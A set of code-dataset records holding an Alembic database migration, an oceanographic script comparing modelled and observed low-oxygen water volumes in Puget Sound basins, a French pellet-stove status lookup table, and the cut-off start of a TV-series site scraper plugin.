###\n op.create_table('users',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=255), server_default='', nullable=False),\n sa.Column('email', sa.String(length=255), nullable=True),\n sa.Column('password', sa.String(), nullable=True),\n sa.Column('order_num', sa.Integer(), server_default='0', nullable=False),\n sa.PrimaryKeyConstraint('id'),\n sa.UniqueConstraint('email')\n )\n op.create_table('tasks',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('user_id', sa.Integer(), nullable=False),\n sa.Column('name', sa.String(length=255), server_default='', nullable=False),\n sa.Column('order_num', sa.Integer(), server_default='0', nullable=False),\n sa.ForeignKeyConstraint(['user_id'], ['users.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n op.create_table('dones',\n sa.Column('id', sa.Integer(), nullable=False),\n sa.Column('task_id', sa.Integer(), nullable=False),\n sa.Column('done_at', sa.DateTime(), server_default=sa.text('now()'), nullable=False),\n sa.Column('order_num', sa.Integer(), server_default='0', nullable=False),\n sa.ForeignKeyConstraint(['task_id'], ['tasks.id'], ondelete='CASCADE'),\n sa.PrimaryKeyConstraint('id')\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_table('dones')\n op.drop_table('tasks')\n op.drop_table('users')\n # ### end Alembic commands ###\n","repo_name":"Tomo-zou-2525/tokidokiyaru-backend","sub_path":"alembic/versions/2023_1030_0100_init.py","file_name":"2023_1030_0100_init.py","file_ext":"py","file_size_in_byte":1862,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"31852341487","text":"\"\"\"\nFinding hypoxic depth and volume using observational data.\n\nTest on mac in ipython:\nrun assess_DO_vol -gtx cas6_v0_live -year 2017 -test False\n\n\"\"\"\n\nimport sys\nimport pandas as pd\nimport xarray as xr\nimport numpy as np\nfrom datetime import datetime\n\nfrom lo_tools import Lfun, zfun, zrfun\nfrom lo_tools import extract_argfun as exfun\nimport cast_functions as cfun\nfrom lo_tools import plotting_functions as pfun\nimport tef_fun as tfun\nimport pickle\n\nimport VFC_functions_2 as vfun\n\nfrom time import time\nfrom subprocess import Popen as Po\nfrom subprocess import PIPE as Pi\n\nfrom scipy.spatial import KDTree\n\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\n\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\n\nimport itertools\n\nfrom collections import defaultdict\n\nimport os\n\n\nLdir = exfun.intro() # this handles the argument passing\n\ndt = pd.Timestamp(str(Ldir['year']) + '-01-01 01:30:00')\nfn_his = cfun.get_his_fn_from_dt(Ldir, dt)\n\nmonth_num = ['01','02','03','04','05','06','07','08','09','10','11','12']\n\nmonth_str = ['Jan','Feb','Mar','Apr','May','Jun','Jul','Aug','Sep','Oct','Nov','Dec']\n\nthreshold_val = 5 #mg/L DO\n\nvar = 'DO_mg_L'\n\nsegments = 'basins' #custom (specify string list and string build list), basins, whole domain, sound and strait\n\n# seg_build_list = optional\n \nG, S, T, land_mask, Lon, Lat, z_rho_grid, dz, dv = vfun.getGridInfo(fn_his)\n\nvol_dir, v_df, j_dict, i_dict, all_seg_list = vfun.getSegmentInfo(Ldir)\n\ninfo_df_dir = (Ldir['LOo'] / 'obs' / 'vfc')\n\ndf_dir = (Ldir['LOo'] / 'obs' / 'vfc' )\n\ninfo_fn = (info_df_dir / ('info_' + str(Ldir['year']) + '.p'))\n\nfn = (df_dir / (str(Ldir['year']) + '.p'))\n\n\n# %%\n\n\njjj_dict, iii_dict, seg_list = 
vfun.defineSegmentIndices(segments, j_dict, i_dict)\n\n# %%\n\ninfo_df = vfun.getCleanInfoDF(info_fn, land_mask, Lon, Lat, seg_list, jjj_dict, iii_dict)\n\ndf = vfun.getCleanDF(fn, info_df)\n\n# %%\n\ninfo_df['month'] = info_df['time'].dt.month\n\ndf['month'] = df['time'].dt.month\n\n# %%\n\nsub_thick_LO_his = {}\n\nsub_thick_LO_casts = {}\n\nsub_thick_obs = {}\n\nsub_vol_LO_his = {}\n\nsub_vol_LO_casts = {}\n\nsub_vol_obs = {}\n\nsub_thick_obs = {}\n\nii_casts = {}\n\njj_casts = {}\n\ncid_dict = {}\n\nsurf_casts_array = {}\n\nsub_casts_array_obs = {}\n\nsub_casts_array_LO_casts = {}\n\n# %%\n\n\nfor seg_name in seg_list:\n \n jjj = jjj_dict[seg_name]\n \n iii = iii_dict[seg_name]\n \n sub_thick_LO_his[seg_name] = {}\n\n sub_thick_LO_casts[seg_name] = {}\n\n sub_thick_obs[seg_name] = {}\n\n sub_vol_LO_his[seg_name] = {}\n\n sub_vol_LO_casts[seg_name] = {}\n \n sub_vol_obs[seg_name] = {}\n\n sub_thick_obs[seg_name] = {}\n\n ii_casts[seg_name] = {}\n\n jj_casts[seg_name] = {}\n \n cid_dict[seg_name] = {}\n \n surf_casts_array[seg_name] = {}\n \n sub_casts_array_obs[seg_name] = {}\n \n sub_casts_array_LO_casts[seg_name] = {}\n\n \n for (mon_num, mon_str) in zip(month_num, month_str):\n \n dt = pd.Timestamp(str(Ldir['year']) + '-'+mon_num+'-01 01:30:00')\n fn_his = cfun.get_his_fn_from_dt(Ldir, dt)\n \n G, S, T, land_mask, Lon, Lat, z_rho_grid, dz, dv = vfun.getGridInfo(fn_his)\n \n sub_vol_LO_his[seg_name][int(mon_num)], sub_thick_LO_his[seg_name][int(mon_num)] = vfun.getLOHisSubVolThick(dv, dz, fn_his, jjj, iii, var, threshold_val)\n \n info_df_use = info_df[(info_df['segment'] == seg_name) & (info_df['month'] == int(mon_num))]\n \n df_use = df[(df['segment'] == seg_name) & (df['month'] == int(mon_num))]\n \n sub_vol_obs[seg_name][int(mon_num)], sub_thick_obs[seg_name][int(mon_num)], surf_casts_array[seg_name][int(mon_num)], sub_casts_array_obs[seg_name][int(mon_num)] = vfun.getOBSCastsSubVolThick(info_df_use, df_use, var, threshold_val, z_rho_grid, dv, dz, land_mask, jjj, iii)\n \n jj_casts[seg_name][int(mon_num)] = info_df_use['jj_cast'].to_numpy()\n \n ii_casts[seg_name][int(mon_num)] = info_df_use['ii_cast'].to_numpy()\n \n cid_dict[seg_name][int(mon_num)] =info_df_use.index.to_numpy()\n \n vfun.extractLOCasts(Ldir, info_df_use, fn_his)\n \n sub_vol_LO_casts[seg_name][int(mon_num)], sub_thick_LO_casts[seg_name][int(mon_num)], sub_casts_array_LO_casts[seg_name][int(mon_num)] = vfun.getLOCastsSubVolThick(Ldir, info_df_use, var, threshold_val, z_rho_grid, dv, dz, land_mask, jjj, iii, surf_casts_array[seg_name][int(mon_num)])\n \n print(seg_name + mon_str)\n \n\n\n# %% \n\nseg_list = ['Whidbey Basin']\n\nfor seg_name in seg_list:\n \n jjj = jjj_dict[seg_name]\n iii = iii_dict[seg_name]\n \n \n min_lat = Lat[min(jjj) - 10]\n max_lat = Lat[max(jjj) + 10]\n \n min_lon = Lon[min(iii) - 10]\n max_lon = Lon[max(iii) + 10] \n \n \n for (mon_num, mon_str) in zip(month_num,month_str):\n \n pfun.start_plot(fs=14, figsize=(16,18))\n fig0, axes0 = plt.subplots(nrows=2, ncols=1, squeeze=False)\n \n c0 = axes0[0,0].pcolormesh(Lon[np.unique(iii)],Lat[np.unique(jjj)], sub_thick_LO_his[seg_name][int(mon_num)], cmap='Blues', alpha = 0.8, vmin = 0, vmax = 300)\n \n axes0[0,0].set_xlim([min_lon,max_lon])\n axes0[0,0].set_ylim([min_lat,max_lat])\n axes0[0,0].tick_params(labelrotation=45)\n axes0[0,0].set_title('LO ' + mon_str + ' ' + str(Ldir['year']) + ' ' + seg_name + ' Sub-' + str(threshold_val) + ' mg/L DO')\n pfun.add_coast(axes0[0,0])\n \n \n c1 = 
# %% \n\nseg_list = ['Whidbey Basin']\n\nfor seg_name in seg_list:\n \n jjj = jjj_dict[seg_name]\n iii = iii_dict[seg_name]\n \n \n min_lat = Lat[min(jjj) - 10]\n max_lat = Lat[max(jjj) + 10]\n \n min_lon = Lon[min(iii) - 10]\n max_lon = Lon[max(iii) + 10] \n \n \n for (mon_num, mon_str) in zip(month_num,month_str):\n \n pfun.start_plot(fs=14, figsize=(16,18))\n fig0, axes0 = plt.subplots(nrows=2, ncols=1, squeeze=False)\n \n c0 = axes0[0,0].pcolormesh(Lon[np.unique(iii)],Lat[np.unique(jjj)], sub_thick_LO_his[seg_name][int(mon_num)], cmap='Blues', alpha = 0.8, vmin = 0, vmax = 300)\n \n axes0[0,0].set_xlim([min_lon,max_lon])\n axes0[0,0].set_ylim([min_lat,max_lat])\n axes0[0,0].tick_params(labelrotation=45)\n axes0[0,0].set_title('LO ' + mon_str + ' ' + str(Ldir['year']) + ' ' + seg_name + ' Sub-' + str(threshold_val) + ' mg/L DO')\n pfun.add_coast(axes0[0,0])\n \n \n c1 = axes0[1,0].pcolormesh(Lon[np.unique(iii)],Lat[np.unique(jjj)], sub_thick_obs[seg_name][int(mon_num)], cmap='Greens', alpha = 0.8, vmin = 0, vmax = 300)\n \n for n in range(len(ii_casts[seg_name][int(mon_num)])):\n \n axes0[1,0].plot(Lon[int(ii_casts[seg_name][int(mon_num)][n])],Lat[int(jj_casts[seg_name][int(mon_num)][n])],'o', c = 'white', markeredgecolor='black', markersize=10)\n \n \n axes0[1,0].set_xlim([min_lon,max_lon])\n axes0[1,0].set_ylim([min_lat,max_lat])\n axes0[1,0].tick_params(labelrotation=45)\n axes0[1,0].set_title('Obs VFC ' + mon_str + ' ' + str(Ldir['year'])+ ' ' + seg_name + ' Sub-' + str(threshold_val) + ' mg/L DO')\n pfun.add_coast(axes0[1,0])\n \n \n # c1 = axes0[1,0].pcolormesh(Lon[np.unique(iii)],Lat[np.unique(jjj)], sub_thick_LO_casts[seg_name][int(mon_num)], cmap='Purples', alpha = 0.8, vmin = 0, vmax = 300)\n \n # for n in range(len(ii_casts[seg_name][int(mon_num)])):\n \n # axes0[1,0].plot(Lon[int(ii_casts[seg_name][int(mon_num)][n])],Lat[int(jj_casts[seg_name][int(mon_num)][n])],'o', c = 'white', markeredgecolor='black', markersize=10)\n \n \n # axes0[1,0].set_xlim([min_lon,max_lon])\n # axes0[1,0].set_ylim([min_lat,max_lat])\n # axes0[1,0].tick_params(labelrotation=45)\n # axes0[1,0].set_title('LO VFC ' + mon_str + ' ' + str(Ldir['year'])+ ' ' + seg_name + ' Sub-' + str(threshold_val) + ' mg/L DO')\n # pfun.add_coast(axes0[1,0])\n \n \n # c2 = axes0[2,0].pcolormesh(Lon[np.unique(iii)],Lat[np.unique(jjj)], sub_thick_obs[seg_name][int(mon_num)], cmap='Greens', alpha = 0.8, vmin = 0, vmax = 300)\n \n # for n in range(len(ii_casts[seg_name][int(mon_num)])):\n \n # axes0[2,0].plot(Lon[int(ii_casts[seg_name][int(mon_num)][n])],Lat[int(jj_casts[seg_name][int(mon_num)][n])],'o', c = 'white', markeredgecolor='black', markersize=10)\n \n \n # axes0[2,0].set_xlim([min_lon,max_lon])\n # axes0[2,0].set_ylim([min_lat,max_lat])\n # axes0[2,0].tick_params(labelrotation=45)\n # axes0[2,0].set_title('Obs VFC ' + mon_str + ' ' + str(Ldir['year'])+ ' ' + seg_name + ' Sub-' + str(threshold_val) + ' mg/L DO')\n # pfun.add_coast(axes0[2,0])\n \n fig0.colorbar(c0,ax=axes0[0,0], label = 'Subthreshold Thickness [m]')\n \n fig0.colorbar(c1,ax=axes0[1,0], label = 'Subthreshold Thickness [m]')\n \n #fig0.colorbar(c2,ax=axes0[2,0], label = 'Subthreshold Thickness [m]')\n \n fig0.tight_layout()\n plt.savefig('/Users/dakotamascarenas/Desktop/pltz/'+seg_name + '_sub_thick_'+str(threshold_val)+'_mg_L_DO_casts_' + str(Ldir['year']) + '_00' + mon_num+'.png')\n\n \n \n# %%\n\npfun.start_plot(fs=14, figsize=(16,9))\nfig1, axes1 = plt.subplots(nrows=1, ncols=1, squeeze=False)\nplt.grid()\n\nfor seg_name in seg_list:\n\n # vol_LO = sub_vol_LO_his[seg_name]\n \n # vol_LO = sorted(vol_LO.items())\n \n # x_LO, y_LO = zip(*vol_LO)\n \n # #x_LO = int(x_LO)\n \n # y_LO = np.multiply(y_LO, 1e-9)\n \n # plt.plot(x_LO,y_LO,label = 'LO', linestyle = '--')\n\n # vol_casts = sub_vol_LO_casts[seg_name]\n \n # vol_casts = sorted(vol_casts.items())\n \n # x_casts, y_casts = zip(*vol_casts)\n \n # # x_obs = int(x_obs)\n \n # y_casts = np.multiply(y_casts, 1e-9)\n \n # plt.plot(x_casts,y_casts,label = seg_name, linestyle = '-.')\n\n vol_obs = sub_vol_obs[seg_name]\n \n vol_obs = sorted(vol_obs.items())\n \n x_obs, y_obs = zip(*vol_obs)\n \n # x_obs = int(x_obs)\n \n y_obs = np.multiply(y_obs, 1e-9)\n \n plt.plot(x_obs,y_obs,label = seg_name)\n \n \naxes1[0,0].set_xlabel('Months (' + str(Ldir['year']) + ')')\n \naxes1[0,0].set_ylabel('Sub-'+str(threshold_val)+' mg/L DO Volume [km^3]')\n\nplt.legend()\n\nplt.savefig('/Users/dakotamascarenas/Desktop/pltz/'+ str(Ldir['year']) +'_sub_vol_'+str(threshold_val)+'_mg_L_DO.png')\n\n# %%\n\n
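# The comparison below scores LO output against observations with an RMSE\n# normalized by the observed range. As a standalone sketch (equivalent to the\n# per-segment computation in the loop that follows):\ndef norm_rmse_sketch(y_obs, y_LO):\n    rmse = np.sqrt(np.mean(np.square(np.subtract(y_obs, y_LO))))  # sqrt of mean squared error\n    return rmse / (np.max(y_obs) - np.min(y_obs))  # normalize by the observed range\n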
import math\n\nnorm_RMSE_dict = {}\n\nplt.close('all')\n\npfun.start_plot(fs=14, figsize=(10,10))\n\nfig2, axes2 = plt.subplots(nrows=1, ncols=1, squeeze=False)\n\nfor seg_name in seg_list:\n \n cmap = cm.get_cmap('twilight', 12)\n \n y_LO = []\n\n y_obs = [] \n \n d = 0 \n \n for (mon_num, mon_str) in zip(month_num, month_str):\n \n #dt = pd.Timestamp('2022-' + mon_num +'-01 01:30:00')\n \n axes2[0,0].plot(sub_vol_obs[seg_name][int(mon_num)]*1e-9, sub_vol_LO_his[seg_name][int(mon_num)]*1e-9, 'o', c=cmap(d), markersize = 10, label = mon_str)\n \n d+=1\n \n y_LO.append(sub_vol_LO_his[seg_name][int(mon_num)]*1e-9)\n \n y_obs.append(sub_vol_obs[seg_name][int(mon_num)]*1e-9)\n \n y_LO = np.array(y_LO)\n \n y_obs = np.array(y_obs)\n \n x_1 = np.linspace(0, max(y_LO))\n \n y_1 = x_1\n \n axes2[0,0].plot(x_1,y_1, color = 'grey', alpha = 0.5)\n \n MSE = np.square(np.subtract(y_obs,y_LO)).mean() # abs dropped: squaring already discards the sign\n \n RMSE = math.sqrt(MSE)\n \n norm_RMSE = RMSE/(y_obs.max()-y_obs.min())\n \n norm_RMSE_dict[seg_name] = norm_RMSE\n \n axes2[0,0].set_xlabel('Obs Sub 5 mg/L Vol [km^3]')\n axes2[0,0].set_ylabel('LO Sub 5 mg/L [km^3]')\n axes2[0,0].set_title(seg_name + ' Vol Comparison, Norm RMSE = '+str(round(norm_RMSE,3)))\n #n_c += 1\n \nhandles, labels = axes2[0,0].get_legend_handles_labels()\nfig2.legend(handles, labels, bbox_to_anchor=(0, -0.2, 1, 0.2), loc=\"upper left\",\n mode=\"expand\", borderaxespad=0, ncol=12) #loc='upper center')\n \nfig2.tight_layout()\nplt.savefig('/Users/dakotamascarenas/Desktop/pltz/comp_vol_'+seg_name+'.png',bbox_inches='tight')\n \n \n \n \n \n# %%\n\nfile_dir = '/Users/dakotamascarenas/Desktop/'\n\n\nwith open((file_dir + 'sub_casts_array_LO_casts.pkl'), 'wb') as f: \n pickle.dump(sub_casts_array_LO_casts, f)\n\nwith open((file_dir + 'sub_casts_array_obs.pkl'), 'wb') as f: \n pickle.dump(sub_casts_array_obs, f) \n\nwith open((file_dir + 'sub_thick_LO_casts.pkl'), 'wb') as f: \n pickle.dump(sub_thick_LO_casts, f)\n\nwith open((file_dir + 'sub_thick_LO_his.pkl'), 'wb') as f: \n pickle.dump(sub_thick_LO_his, f) \n \nwith open((file_dir + 'sub_thick_obs.pkl'), 'wb') as f: \n pickle.dump(sub_thick_obs, f)\n\nwith open((file_dir + 'sub_vol_LO_casts.pkl'), 'wb') as f: \n pickle.dump(sub_vol_LO_casts, f) \n\nwith open((file_dir + 'sub_vol_LO_his.pkl'), 'wb') as f: \n pickle.dump(sub_vol_LO_his, f)\n\nwith open((file_dir + 'sub_vol_obs.pkl'), 'wb') as f: \n pickle.dump(sub_vol_obs, f) \n \nwith open((file_dir + 'surf_casts_array.pkl'), 'wb') as f: \n pickle.dump(surf_casts_array, f) \n \nwith open((file_dir + 'jj_casts.pkl'), 'wb') as f: \n pickle.dump(jj_casts, f)\n\nwith open((file_dir + 'ii_casts.pkl'), 'wb') as f: \n pickle.dump(ii_casts, f) \n \nwith open((file_dir + 'cid_dict.pkl'), 'wb') as f: \n pickle.dump(cid_dict, f) \n \n\n\n# %%\n\n
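# Round-trip sketch: any result saved above can be reloaded the same way, e.g.\n# (name is one of the .pkl basenames written above; file_dir as defined above):\ndef load_result_sketch(name, file_dir=file_dir):\n    with open(file_dir + name + '.pkl', 'rb') as f:\n        return pickle.load(f)\n\n# sub_vol_obs_reloaded = load_result_sketch('sub_vol_obs')\n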
","repo_name":"dakotamm/LO_user","sub_path":"archive/assess_DO_vol.py","file_name":"assess_DO_vol.py","file_ext":"py","file_size_in_byte":12671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"195073885","text":"#coding: utf-8\r\n\r\n'''\nLookup tables\n\n\tRank 0 is the position of the field in the MAESTRO frame\n\tRank 1 is the label published on the broker\n\tRank 2 (optional) replaces the raw frame code with the corresponding display text\n\n'''\nRecuperoInfo=[\n\t[1,\"Etat du poêle\",[\n\t\t\t\t\t\t[0, \"Eteint\"],\n\t\t\t\t\t\t[1, \"Controle du poele froid / chaud\"],\n\t\t\t\t\t\t[2, \"Clean Froid\"],\n\t\t\t\t\t\t[3, \"Load Froid\"],\n\t\t\t\t\t\t[4, \"Start 1 Froid\"],\n\t\t\t\t\t\t[5, \"Start 2 Froid\"],\n\t\t\t\t\t\t[6, \"Clean Chaud\"],\n\t\t\t\t\t\t[7, \"Load Chaud\"],\n\t\t\t\t\t\t[8, \"Start 1 chaud\"],\n\t\t\t\t\t\t[9, \"Start 2 chaud\"],\n\t\t\t\t\t\t[10, \"Stabilisation\"],\n\t\t\t\t\t\t[11, \"Puissance 1\"],\n\t\t\t\t\t\t[12, \"Puissance 2\"],\n\t\t\t\t\t\t[13, \"Puissance 3\"],\n\t\t\t\t\t\t[14, \"Puissance 4\"],\n\t\t\t\t\t\t[15, \"Puissance 5\"],\n\t\t\t\t\t\t[30, \"Mode diagnostique\"],\n\t\t\t\t\t\t[31, \"Marche\"],\n\t\t\t\t\t\t[40, \"Extinction\"],\n\t\t\t\t\t\t[41, \"Refroidissement en cours\"],\n\t\t\t\t\t\t[42, \"Nettoyage basse p.\"],\n\t\t\t\t\t\t[43, \"Nettoyage haute p.\"],\n\t\t\t\t\t\t[44, \"Débloquage vis sans fin\"],\n\t\t\t\t\t\t[45, \"AUTO ECO\"],\n\t\t\t\t\t\t[46, \"Standby\"],\n\t\t\t\t\t\t[48, \"Diagnostique\"],\n\t\t\t\t\t\t[49, \"CHARG. VIS SANS FIN\"],\n\t\t\t\t\t\t[50, \"Erreur A01 - Allumage raté\"],\n\t\t\t\t\t\t[51, \"Erreur A02 - Pas de flamme\"],\n\t\t\t\t\t\t[52, \"Erreur A03 - Surchauffe du réservoir\"],\n\t\t\t\t\t\t[53, \"Erreur A04 - Température des fumées trop haute\"],\n\t\t\t\t\t\t[54, \"Erreur A05 - Obstruction conduit - Vent\"],\n\t\t\t\t\t\t[55, \"Erreur A06 - Mauvais tirage\"],\n\t\t\t\t\t\t[56, \"Erreur A09 - Défaillance sonde de fumées\"],\n\t\t\t\t\t\t[57, \"Erreur A11 - Défaillance motoréducteur\"],\n\t\t\t\t\t\t[58, \"Erreur A13 - Température carte mère trop haute\"],\n\t\t\t\t\t\t[59, \"Erreur A14 - Défaut Active\"],\n\t\t\t\t\t\t[60, \"Erreur A18 - Température d'eau trop haute\"],\n\t\t\t\t\t\t[61, \"Erreur A19 - Défaut sonde température eau\"],\n\t\t\t\t\t\t[62, \"Erreur A20 - Défaut sonde auxiliaire\"],\n\t\t\t\t\t\t[63, \"Erreur A21 - Alarme pressostat\"],\n\t\t\t\t\t\t[64, \"Erreur A22 - Défaut sonde ambiante\"],\n\t\t\t\t\t\t[65, \"Erreur A23 - Défaut fermeture brasero\"],\n\t\t\t\t\t\t[66, \"Erreur A12 - Panne controleur motoréducteur\"],\n\t\t\t\t\t\t[67, \"Erreur A17 - Bourrage vis sans fin\"],\n\t\t\t\t\t\t[69, \"Attente Alarmes securité\"],\n\t\t\t\t\t\t]],\n\t[2,\"Etat du ventilateur d'ambiance\",[\n\t\t\t\t\t\t\t\t\t\t[0, \"Désactivé\"],\n\t\t\t\t\t\t\t\t\t\t[1, \"Niveau 1\"],\n\t\t\t\t\t\t\t\t\t\t[2, \"Niveau 2\"],\n\t\t\t\t\t\t\t\t\t\t[3, \"Niveau 3\"],\n\t\t\t\t\t\t\t\t\t\t[4, \"Niveau 4\"],\n\t\t\t\t\t\t\t\t\t\t[5, \"Niveau 5\"],\n\t\t\t\t\t\t\t\t\t\t[6, \"Automatique\"],\n\t\t\t\t\t\t\t\t\t\t]],\n\t[5,\"Température des fumées\"],\n\t[6,\"Température ambiante\"],\n\t[10,\"Etat de la bougie\"],\n\t[11,\"ACTIVE - Set\"],\n\t[12,\"RPM - Ventilateur fumées\"],\n\t[13,\"RPM - Vis sans fin - SET\"],\n\t[14,\"RPM - Vis sans fin - LIVE\"],\n\t[20,\"Etat du mode Active\"], #0: Disabled, 1: Enabled\n\t[21,\"ACTIVE - Live\"],\n\t[22,\"Mode de régulation\",[\n\t\t\t\t\t\t\t\t[0, \"Manuelle\"],\n\t\t\t\t\t\t\t\t[1, \"Dynamique\"],\n\t\t\t\t\t\t\t\t]],\n\t[23,\"Mode ECO\"],\n\t[25,\"Mode Chronotermostato\"],\n\t[26,\"TEMP - Consigne\"],\n\t[28,\"TEMP - Carte mère\"],\n\t[29,\"Puissance Active\",[\n\t\t\t\t\t\t\t[11, \"Puissance 1\"],\n\t\t\t\t\t\t\t[12, \"Puissance 2\"],\n\t\t\t\t\t\t\t[13, \"Puissance 3\"],\n\t\t\t\t\t\t\t[14, \"Puissance 4\"],\n\t\t\t\t\t\t\t[15, \"Puissance 5\"],\n\t\t\t\t\t\t\t]],\n\t[32,\"Heure du poêle (0-23)\"],\n\t[33,\"Minutes du poêle (0-29)\"],\n\t[34,\"Jour du poêle (1-31)\"],\n\t[35,\"Mois du poêle 
(1-12)\"],\n\t[36,\"Année du poêle\"],\n\t[37,\"Heures de fonctionnement total (s)\"],\n\t[38,\"Heures de fonctionnement en puissance 1 (s)\"],\n\t[39,\"Heures de fonctionnement en puissance 2 (s)\"],\n\t[40,\"Heures de fonctionnement en puissance 3 (s)\"],\n\t[41,\"Heures de fonctionnement en puissance 4 (s)\"],\n\t[42,\"Heures de fonctionnement en puissance 5 (s)\"],\n\t[43,\"Heures avant entretien\"],\n\t[44,\"Minutes avant extinction\"],\n\t[45,\"Nombre d'allumages\"],\n\t[49,\"Etat effets sonores\"],\n\t[51,\"Mode\",[\n\t\t\t\t[0, \"Hiver\"],\n\t\t\t\t[1, \"Eté\"],\n\t\t\t\t]],\n\t]","repo_name":"Anthony-55/Maestro","sub_path":"_data_.py","file_name":"_data_.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"fr","doc_type":"code","stars":8,"dataset":"github-code","pt":"2"} +{"seq_id":"15149305571","text":"# -*- coding: utf-8 -*-\r\nfrom core.libs import *\r\n\r\nHOST = 'http://www.wikiseriesonline.nu'\r\n\r\nLNG = Languages({\r\n Languages.es: ['espanol', '3', 'espa%25C3%25B1ol', 'español'],\r\n Languages.en: ['ingles', '5', 'english'],\r\n Languages.la: ['latino', '1'],\r\n Languages.sub_es: ['subtitulado', '4'],\r\n Languages.vo: ['vo']\r\n})\r\n\r\nQLT = Qualities({\r\n Qualities.hd: ['3', '5', 'hd-720p', 'hd'],\r\n Qualities.sd: ['1', '2'],\r\n Qualities.hd_full: ['4', 'hd-1080p']\r\n})\r\n\r\ndef mainlist(item):\r\n logger.trace()\r\n itemlist = list()\r\n\r\n itemlist.append(item.clone(\r\n action=\"newest_episodes\",\r\n label=\"Nuevos episodios\",\r\n url=HOST + '/category/episode',\r\n type=\"item\",\r\n content_type='episodes'\r\n ))\r\n\r\n itemlist.append(item.clone(\r\n action=\"newest_tvshows\",\r\n label=\"Nuevas series\",\r\n url=HOST + '/category/serie',\r\n type=\"item\",\r\n category='tvshow',\r\n content_type='tvshows'\r\n ))\r\n\r\n itemlist.append(item.clone(\r\n action=\"search\",\r\n label=\"Buscar series\",\r\n query=True,\r\n type='search',\r\n category='tvshow',\r\n content_type='tvshows'\r\n ))\r\n\r\n itemlist.append(item.clone(type=\"label\"))\r\n itemlist.append(item.clone(\r\n label=\"Series por género:\",\r\n type=\"label\",\r\n category='tvshow',\r\n content_type='tvshows'\r\n ))\r\n\r\n\r\n for url, label in [(\"/category/accion\", \"Acción\"), (\"/category/anime\", \"Animación\"), (\"/category/aventura\", \"Aventura\"),\r\n (\"/category/ciencia-ficcion\", \"Ciencia Ficción\"), (\"/category/comedia\", \"Comedia\"),\r\n (\"/category/crimen\", \"Crimen\"), (\"/category/drama\", \"Drama\"), (\"/category/fantasia\", \"Fantasía\"),\r\n (\"/category/belico\", \"Guerra\"), (\"/category/horror\", \"Horror\"), (\"/category/misterio\", \"Misterio\"),\r\n (\"/category/romance\", \"Romance\"), (\"/category/suspenso\", \"Suspense\")]:\r\n\r\n itemlist.append(item.clone(\r\n action=\"newest_tvshows\",\r\n label=label,\r\n url=HOST + url,\r\n type=\"item\",\r\n category='tvshow',\r\n group=True,\r\n content_type='tvshows'\r\n ))\r\n\r\n return itemlist\r\n\r\n\r\ndef newest_tvshows(item):\r\n logger.trace()\r\n itemlist = list()\r\n\r\n if not item.url:\r\n item.url = HOST + '/category/serie'\r\n\r\n data = httptools.downloadpage(item.url).data\r\n data = re.sub(r\"\\n|\\r|\\t|\\s{2}\", \"\", data)\r\n\r\n patron = '
","repo_name":"Anthony-55/Maestro","sub_path":"_data_.py","file_name":"_data_.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"fr","doc_type":"code","stars":8,"dataset":"github-code","pt":"2"} +{"seq_id":"15149305571","text":"# -*- coding: utf-8 -*-\r\nfrom core.libs import *\r\n\r\nHOST = 'http://www.wikiseriesonline.nu'\r\n\r\nLNG = Languages({\r\n Languages.es: ['espanol', '3', 'espa%25C3%25B1ol', 'español'],\r\n Languages.en: ['ingles', '5', 'english'],\r\n Languages.la: ['latino', '1'],\r\n Languages.sub_es: ['subtitulado', '4'],\r\n Languages.vo: ['vo']\r\n})\r\n\r\nQLT = Qualities({\r\n Qualities.hd: ['3', '5', 'hd-720p', 'hd'],\r\n Qualities.sd: ['1', '2'],\r\n Qualities.hd_full: ['4', 'hd-1080p']\r\n})\r\n\r\ndef mainlist(item):\r\n logger.trace()\r\n itemlist = list()\r\n\r\n itemlist.append(item.clone(\r\n action=\"newest_episodes\",\r\n label=\"Nuevos episodios\",\r\n url=HOST + '/category/episode',\r\n type=\"item\",\r\n content_type='episodes'\r\n ))\r\n\r\n itemlist.append(item.clone(\r\n action=\"newest_tvshows\",\r\n label=\"Nuevas series\",\r\n url=HOST + '/category/serie',\r\n type=\"item\",\r\n category='tvshow',\r\n content_type='tvshows'\r\n ))\r\n\r\n itemlist.append(item.clone(\r\n action=\"search\",\r\n label=\"Buscar series\",\r\n query=True,\r\n type='search',\r\n category='tvshow',\r\n content_type='tvshows'\r\n ))\r\n\r\n itemlist.append(item.clone(type=\"label\"))\r\n itemlist.append(item.clone(\r\n label=\"Series por género:\",\r\n type=\"label\",\r\n category='tvshow',\r\n content_type='tvshows'\r\n ))\r\n\r\n\r\n for url, label in [(\"/category/accion\", \"Acción\"), (\"/category/anime\", \"Animación\"), (\"/category/aventura\", \"Aventura\"),\r\n (\"/category/ciencia-ficcion\", \"Ciencia Ficción\"), (\"/category/comedia\", \"Comedia\"),\r\n (\"/category/crimen\", \"Crimen\"), (\"/category/drama\", \"Drama\"), (\"/category/fantasia\", \"Fantasía\"),\r\n (\"/category/belico\", \"Guerra\"), (\"/category/horror\", \"Horror\"), (\"/category/misterio\", \"Misterio\"),\r\n (\"/category/romance\", \"Romance\"), (\"/category/suspenso\", \"Suspense\")]:\r\n\r\n itemlist.append(item.clone(\r\n action=\"newest_tvshows\",\r\n label=label,\r\n url=HOST + url,\r\n type=\"item\",\r\n category='tvshow',\r\n group=True,\r\n content_type='tvshows'\r\n ))\r\n\r\n return itemlist\r\n\r\n\r\ndef newest_tvshows(item):\r\n logger.trace()\r\n itemlist = list()\r\n\r\n if not item.url:\r\n item.url = HOST + '/category/serie'\r\n\r\n data = httptools.downloadpage(item.url).data\r\n data = re.sub(r\"\\n|\\r|\\t|\\s{2}\", \"\", data)\r\n\r\n patron = '.*?src=\"([^\"]+).*?' \\\r\n '(.*?)
